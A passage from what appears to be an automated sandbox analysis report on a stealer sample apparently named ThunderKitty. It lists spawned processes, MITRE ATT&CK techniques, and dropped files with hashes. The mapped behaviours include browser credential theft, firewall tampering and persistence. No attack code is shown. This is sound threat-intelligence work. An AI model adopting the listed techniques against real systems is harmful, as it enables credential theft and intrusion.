  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp" "c:\Users\Admin\AppData\Local\Temp\gtcvzijr\CSCB63CF249BEA34E0391207E6455539A8.TMP"
      4⤵
      PID:5100

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x360 0x408
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
360B

MD5
42a3e507d48a9cb6215ca9938eab61eb

SHA1
58c18dbd1b4fc1f724093100eebb2b1deba3c42f

SHA256
7f80bfda515b23fe7c4d67bb7c8513fa8a41bd070f09fd587f1be757a12c1cc2

SHA512
97ac52563a533a781fc333f1304d5ace76101266ade0b50f6a83e469dc1f2a594fe5c7de317d805d753f18d1263f4dc1f4c9e8dc195a1fce27b75eff87c8aefd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cb773d3cb42a8e42796e4777c3b9b3f6

SHA1
fb55d9b2b33bc0ec2d3412e91c36cb9af69bc90f

SHA256
3297a9790da3a9dc73c2465e427fc8a3dda387e787f301d2a4b5f99fa8a13da3

SHA512
b70b769caed999941cc5fdf0b6caaffc9dfe2d8a9afb10d90fec6f016e7ad4362d59ef4c28d2dd870e68f1be6fe1f39ee14ebbdd6427c729873a215846ac61a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b66db53846de4860ca72a3e59b38c544

SHA1
2202dc88e9cddea92df4f4e8d83930efd98c9c5a

SHA256
b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

SHA512
72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB882.tmp

Filesize
1KB

MD5
3dfefaa550483a2eb83162c9403f5bed

SHA1
be4c72f5068441e1262f97a4c5ff1de13aeff648

SHA256
7487913514749dc14e4af1b1784199e736982eda0f30a8e1ffccd36a9515fc0e

SHA512
2f3ec45b6ae9f209b0c713e8bca4ee5025cc8d43125cc13b1f17dcd3653485a626c44a1d6331a9a14d2fa386b508809a45b73f8b68fbef4a01f52b5213cbac43

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp

Filesize
1KB

MD5
212dc419f675b7c890721990c23105cc

SHA1
39d40e6f76ed80e68207b4c0ff0849082deaafcf

SHA256
5a4948c7ad5dfce7d90515d0a4138f6910ca28f37251e3665de24d2cfca926dd

SHA512
016d1a8819c4c727901ed305219a657d6c196f6735e9f31d3a64b87dcfec812fc573b1537143c6971b3e478eba97e9806d489ad9dd4befbc0e012797320cd0c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp

Filesize
1KB

MD5
8518407243ef149d630ad0999189f1f0

SHA1
745265b6b0e8a8efdec34e73bbd1451554c6e566

SHA256
a2e924f753b40e592ac9c2b9dfada88aecffb51803c6901c5cff50a187d5a45e

SHA512
88b52df812828c1591b24ebb0d87909d7ee248f96cdeac91e1d3b337bb2ab52e32d986ae733000d7f63a356ca3269d26b5d55548f6d73e13b8bd952927b70a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
72KB

MD5
9a2d58c3604cb1a996f9bba9837c6840

SHA1
5cac465afa69b4ef49a5b9693307691984e0a4cd

SHA256
b576a37cfb34d710c438bfb69d4ed8855d460546adddd25921b46f3672e1a74a

SHA512
d518d89c147380476ed39bf371bef552f5bd5d691a4b10c25da5d0ea8b5195601ee34f038bdb69872f86f328e426dc0144614ad4d461d72cb946fc47ac6f76e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
24KB

MD5
8a29e641e8f0a156c169605af78221ad

SHA1
e09539b9552ecb8e5c20e8dc86334dfc8a38f9e4

SHA256
9a226f8846bf8cdd52f1fac2d05bbb7e8e4c1e14572f51530b0709de52221c77

SHA512
570f54233901b413588119ebfbe8809984a3fb2ef9a39ede4986c683c5b6bab6876a0c97cdcd2e010c64fc6c1943148b0551ccd0ba1536fb00ae453162c93136

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsqbigeo.lab.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.dll

Filesize
4KB

MD5
4b8a293f6f69dcc4ba7bd483f8ddd3c4

SHA1
e11ed93e925ca07233a4a6591fe4f29232593e2e

SHA256
a28454ce25ee4445329c10fa67a83e0944862812c6ecec1015612a8a737e289e

SHA512
f60d12dc9376a33329f31f30d6cd88d9972cce35620689f10735f8b2e7a188b76d32236dd88e72709e9276ee8e2b05d1923af07112f0f3729445b1b2e63a0402

Download Submit
C:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.dll

Filesize
4KB

MD5
38e2dbaf8ea97886466086a02aaf2fe3

SHA1
a6bebdb7ab24e76a4886d7053a02b4e254b100f4

SHA256
022a4bb2ac8537b3fb17008c94fe45af7b60f1caeee0fbf69638bd88bf605f5f

SHA512
fb750397f117f82499ca8fd914aaaaa320dde2fc96994d4081e87a345b04ee075e9a08fdd010dd45643d8967d4f7428f8c5acdb19903194e9b2940bc9a85d40f

Download Submit
C:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.dll

Filesize
4KB

MD5
dc0833b381e34e08e6ce0781d5d1d915

SHA1
22ad273c945616919f64633e3148c7d4cc41c343

SHA256
ec44e8eb6af714a72d2e870bb2be428125b986e4b176c6dbb6634c0941befad1

SHA512
eba0aa675da7bd99ee65889736cc2d7e2f6e981cf3861b0ce86a465c06cb42589d33ababe2c8d546c2c78472e764913c0cc6e291173fd6b044508cb5d3a046bd

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\CSC32F7FA706BA342FC8B8A58409BEEC249.TMP

Filesize
652B

MD5
0603d7c3aa7b09780367c8424256509c

SHA1
741dd50c347703a237bb7fdec23cf88773be7ae2

SHA256
e9e9da29a7600a8bc8e87a1285ce6d79bf3462dbf3afc7bf8ad3d8f28164a8c3

SHA512
47eab6f5bd048fd6860184405f40d0b91f6c37d87cbf0becce8f3ffef06392d4414d19e2c079142010f1888ead0a38b5e8d5513453a9c46e9dded2bc42cbd202

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.cmdline

Filesize
369B

MD5
156c3f0e87cae2243a3acadb43e7a953

SHA1
7b37ddef654fc06871f849ddea9454459fc924f6

SHA256
aab4e17cd43f7fe7df118765f4c19171e20b551318f68b3be31ad3e562805745

SHA512
e0abe4af71c6ddad14122f3e3a1132a176d91eedf86019dcb863968547c730893206c19c0e340b58048fae27a9d9c25ef0614dd7f0b1d29cf1091f4c2562d036

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gtcvzijr\CSCB63CF249BEA34E0391207E6455539A8.TMP

Filesize
652B

MD5
138fef6a49040c20aa2e3f987bac40a8

SHA1
65b48329b6da7ad8b48211e7d5003a66b1bd1572

SHA256
28c45d6ae400a84c76295cde4fb6990a2003f3fc6f7424603e37b83edd087bd2

SHA512
573efb53f867c44963f495252d509c5e0c5a47e1ead395bd0845700f7d711799581a2f62821b1192d0e10e092d08106c1f4081cf12e985d9beff1681121c2e22

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.cmdline

Filesize
369B

MD5
f4ec44b1e0416522e893656f4211dd85

SHA1
21fa73d2c47c8873bb7d36ee92da430ec8932692

SHA256
33740df0d38fae04117de2d0c2674ffdd4514d1f1d2cc758936d5aba324aeb19

SHA512
9bcca84082919838c7b17fde5df8b85349d055efbbc40ba14b5f39c833f38f9883d52427ad2107a81a8dda7f6456be72b4f8ae6307697548cb203e6b6669be87

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\CSCD9452996B36F4B7B99B5DEF928F07273.TMP

Filesize
652B

MD5
03aa63ac01dcc0d4064dcb739854c5eb

SHA1
1249475a980712e0ecea2835ca705fd815b5c0c3

SHA256
ce618cb9a317a0677667cc08ec1a4d02f033fe26bb7ef0314b30153ee0ee9e29

SHA512
2c6183995c61a727ef571dc5c5403270c7fc4ba2d12a46fcc9ae35806b8a106ad6c7a04652a0692506f1cae8e7a54bbbdbeff6f82db02d1152a9c6da4cd50825

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.cmdline

Filesize
369B

MD5
901529e410f56056b087c902be3e28b4

SHA1
983d24144434a734ffd3da1f1a8fe326fee4d7ad

SHA256
6ad490659f82e8a4539dee23220bbbc1c2a27903853a4a6863170db4d3fdeec3

SHA512
f8214328f29e404e1ad6d327a345a5b5f2784bcb58612d5b6d39abef7fe42e6d2cd750696c4ea338a36f05a8a3aa1e3a95235384f8e5a09d280a8a5a32fe1e33

Download Submit
memory/516-35-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

Filesize
10.8MB

Download
memory/516-83-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

Filesize
10.8MB

Download
memory/516-32-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

Filesize
10.8MB

Download
memory/516-34-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

Filesize
10.8MB

Download
memory/540-96-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

Filesize
10.8MB

Download
memory/540-0-0x00007FFE8FA03000-0x00007FFE8FA05000-memory.dmp

Filesize
8KB

Download
memory/540-81-0x000001D8D4300000-0x000001D8D4308000-memory.dmp

Filesize
32KB

Download
memory/540-21-0x000001D8D4310000-0x000001D8D4332000-memory.dmp

Filesize
136KB

Download
memory/540-11-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

Filesize
10.8MB

Download
memory/540-1-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

Filesize
10.8MB

Download
memory/3112-98-0x000002572B0F0000-0x000002572B114000-memory.dmp

Filesize
144KB

Download
memory/3112-97-0x000002572B0F0000-0x000002572B11A000-memory.dmp

Filesize
168KB

Download
memory/3112-84-0x000002572B680000-0x000002572BE26000-memory.dmp

Filesize
7.6MB

Download
memory/3112-78-0x000002572AAE0000-0x000002572AAE8000-memory.dmp

Filesize
32KB

Download
memory/3112-155-0x000002572B0F0000-0x000002572B102000-memory.dmp

Filesize
72KB

Download
memory/3112-156-0x000002572B0E0000-0x000002572B0EA000-memory.dmp

Filesize
40KB

Download
memory/3232-126-0x000001FF30130000-0x000001FF30138000-memory.dmp

Filesize
32KB

Download